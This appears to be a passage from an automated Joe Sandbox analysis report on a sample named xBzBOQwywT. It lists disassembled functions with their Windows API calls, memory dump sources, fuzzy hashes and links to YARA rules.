                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                        Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                        Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                        Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 004503C8
                                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Proc$Parent
                                                                        • String ID:
                                                                        • API String ID: 2351499541-0
                                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                        Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                        • String ID:
                                                                        • API String ID: 1795658109-0
                                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                        Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        • Opcode ID: 6b71ee79f7a4bb555812c1c70c13a31db21db748a7a18dfc89ceff48339ea548
                                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                        • Opcode Fuzzy Hash: 6b71ee79f7a4bb555812c1c70c13a31db21db748a7a18dfc89ceff48339ea548
                                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                        Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                        • _wcslen.LIBCMT ref: 00449519
                                                                        • _wcslen.LIBCMT ref: 00449526
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                                        • String ID:
                                                                        • API String ID: 2886238975-0
                                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                        Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                                        • String ID:
                                                                        • API String ID: 1792727568-0
                                                                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                        Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                        Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                        • String ID: cdecl
                                                                        • API String ID: 3850814276-3896280584
                                                                        • Opcode ID: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                        • Opcode Fuzzy Hash: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                        Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                        • _memmove.LIBCMT ref: 0046D475
                                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 2502553879-0
                                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                        Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 00448C69
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 312131281-0
                                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                        Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastacceptselect
                                                                        • String ID:
                                                                        • API String ID: 385091864-0
                                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                        Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                        Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
